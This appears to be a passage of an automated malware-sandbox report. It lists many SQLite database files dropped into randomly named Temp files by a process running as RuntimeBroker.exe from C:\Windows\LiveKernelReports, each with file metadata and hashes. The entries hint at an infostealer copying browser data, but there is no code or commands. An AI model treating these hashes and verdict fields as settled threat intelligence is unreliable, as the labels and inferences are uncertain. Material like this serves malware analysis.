                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\U8s1VXJGab

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\UMuv3DhKb6

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\UnxhMWwBAf

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\VXUixptp2h

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\VYcLiyFj9I

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\VgeK5xoTWT

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\VzExpjfBaR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\WIHZOtdynR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\WOOfT0SO56

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\WTJCl3vkX0

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\WgjZJXNr94

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\WiIfdSYJo8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\WxwZey1CqH

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\XIKz5h0d1S

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\XLKiSOIb9r

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Xp9jqkgbmd

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\XqBYegkOR9

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\YD0BCI9i7U

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\YLKaXaemlx

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\YuAu7xFcma

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\YxiFzwSDAh

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ZJtUtKGceP

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ZaRVqtHgPR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ZrvfXFqFfB

